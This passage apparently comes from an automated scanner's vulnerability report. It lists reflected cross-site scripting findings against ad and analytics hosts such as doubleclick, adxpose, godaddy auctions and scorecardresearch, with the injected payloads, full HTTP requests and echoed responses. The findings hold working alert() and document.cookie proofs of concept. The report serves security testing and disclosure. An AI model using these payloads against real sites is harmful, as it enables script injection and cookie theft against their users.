<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
jh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...
4.13. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ee8f"-alert(1)-"cfa1a2cd9c1 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
L2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw7ee8f"-alert(1)-"cfa1a2cd9c1&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...
4.14. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40f27"-alert(1)-"12d3ff8d5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7275

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aeb/f/1c2/%2a/e%3B239614143%3B0-0%3B0%3B62445293%3B3454-728/90%3B41577488/41595275/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l40f27"-alert(1)-"12d3ff8d5&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0
...[SNIP]...
4.15. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b617a<script>alert(1)</script>d0fbd595a25 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0764E8067AD048B1710A67299AA363A4; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=c6c75b6e-8553-43d3-8fc7-6ddce47cdd98; Domain=adxpose.com; Expires=Thu, 04-May-2079 17:03:21 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 13:49:13 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
_LOG_EVENT__("000_000_3",b,j,"",Math.round(Y.left)+","+Math.round(Y.top),O+","+I,C,l,m,v,S,c)}}t=p.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_321611b617a<script>alert(1)</script>d0fbd595a25".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_321611b617a<script>
...[SNIP]...
4.16. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0fc6"%3balert(1)//e92a6e136cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0fc6";alert(1)//e92a6e136cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b0fc6"%3balert(1)//e92a6e136cf=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 252812
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sbhw2g45lra5ew55khjmd0n1; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=b0fc6%22%3balert(1)%2f%2fe92a6e136cf=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart()
               {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?b0fc6";alert(1)//e92a6e136cf=1");
                   if (document.getElementById("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", document.getElementById("ctl00_cphMaster_tbBidAmount").value); }
                   else if (document.getElementBy
...[SNIP]...
4.17. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bcc8"><script>alert(1)</script>deeb52d7f31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7bcc8"><script>alert(1)</script>deeb52d7f31=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 253492
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yafoqa55zfssbv55lwxafz55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=M1PWTDNAMWEB004&status=200 OK&querystring=7bcc8%22%3e%3cscript%3ealert(1)%3c%2fscript%3edeeb52d7f31=1&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
Date: Sat, 16 Apr 2011 13:57:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
keyCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode; if (keyCode == 13){ RecordClick(event, '22362', '');createFormAndSubmit('https://auctions.godaddy.com/trpHome.aspx?7bcc8"><script>alert(1)</script>deeb52d7f31=1');return false;}" />
...[SNIP]...
4.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload ae283<script>alert(1)</script>2c0f2ef6ff was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2ae283<script>alert(1)</script>2c0f2ef6ff&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:11 GMT
Date: Sat, 16 Apr 2011 13:51:11 GMT
Connection: close
Content-Length: 1252

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2ae283<script>alert(1)</script>2c0f2ef6ff", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload b5161<script>alert(1)</script>029ad526e2b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c10=b5161<script>alert(1)</script>029ad526e2b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:17 GMT
Date: Sat, 16 Apr 2011 13:51:17 GMT
Connection: close
Content-Length: 1253

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"b5161<script>alert(1)</script>029ad526e2b", c15:"", c16:"", r:""});


4.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 90e71<script>alert(1)</script>bdd122ed418 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15=90e71<script>alert(1)</script>bdd122ed418 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:15 GMT
Date: Sat, 16 Apr 2011 13:51:15 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"90e71<script>alert(1)</script>bdd122ed418", c16:"", r:""});


4.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 93f7e<script>alert(1)</script>4815f34f790 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=300569393f7e<script>alert(1)</script>4815f34f790&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"300569393f7e<script>alert(1)</script>4815f34f790", c3:"3", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 28299<script>alert(1)</script>55b70b1e4ba was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=328299<script>alert(1)</script>55b70b1e4ba&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:12 GMT
Date: Sat, 16 Apr 2011 13:51:12 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"328299<script>alert(1)</script>55b70b1e4ba", c4:"http://alltop.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 908bc<script>alert(1)</script>b3a96683e20 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F908bc<script>alert(1)</script>b3a96683e20&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:13 GMT
Date: Sat, 16 Apr 2011 13:51:13 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
core;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/908bc<script>alert(1)</script>b3a96683e20", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


4.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 36087<script>alert(1)</script>c08dcabcf01 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=36087<script>alert(1)</script>c08dcabcf01&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"36087<script>alert(1)</script>c08dcabcf01", c6:"", c10:"", c15:"", c16:"", r:""});


4.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 2bbdc<script>alert(1)</script>53129e2fbb3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

